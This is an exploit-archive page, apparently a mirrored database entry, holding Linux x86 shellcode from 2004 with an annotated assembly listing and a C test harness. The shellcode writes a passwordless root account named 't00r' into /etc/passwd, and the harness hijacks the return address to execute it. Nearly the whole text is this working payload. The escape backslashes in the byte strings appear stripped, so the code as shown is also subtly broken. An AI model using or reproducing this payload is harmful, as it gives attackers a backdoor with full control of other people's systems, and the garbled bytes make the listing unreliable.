[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 add user t00r 82 bytes
# Published : 2004-09-12
# Author : Matias Sedalo
# Previous Title : linux/x86 portbind port 5074 + fork() 130 bytes
# Next Title : linux/x86 add user 104 bytes
/*
* s0t4ipv6@shellcode.com.ar
* 0x14abril0x7d2
*
* 82 bytes
* Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd
*
* Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c
*
*/
#include <stdio.h>
// Shellcode // Asm Code
char shellcode[]=
"x31xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x68x73x73x77x64" // pushl $0x64777373
"x68x63x2fx70x61" // pushl $0x61702f63
"x68x2fx2fx65x74" // pushl $0x74652f2f
"x89xe3" // movl %esp,%ebx
"x8dx48x02" // leal 0x2(%eax),%ecx
"x8dx40x05" // leal 0x5(%eax),%eax
"xcdx80" // int $0x80
"x89xc3" // movl %eax,%ebx
"x87xca" // xchgl %ecx,%edx
"x31xc9" // xorl %ecx,%ecx
"xb0x13" // movb $0x13,%al
"xcdx80" // int $0x80
"x51" // pushl %ecx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x3ax2fx62x69" // pushl $0x69622f3a
"x68x30x3ax3ax2f" // pushl $0x2f3a3a30
"x68x3ax3ax30x3a" // pushl $0x3a303a3a
"x68x74x30x30x72" // pushl $0x72303074
"x8dx41x04" // leal 0x4(%ecx),%eax
"x89xe1" // movl %esp,%ecx
"xb2x14" // movb $0x14,%dl
"xcdx80" // int $0x80
"x31xc0" // xorl %eax,%eax
"xb0x06" // movb $0x6,%al
"xcdx80" // int $0x80
"x40" // incl %eax
"xcdx80"; // int $0x80
main() {
int *ret;
ret=(int *)&ret+2;
printf("Shellcode lenght=%dn",strlen(shellcode));
(*ret) = (int)shellcode;
}
// www.Syue.com [2004-09-12]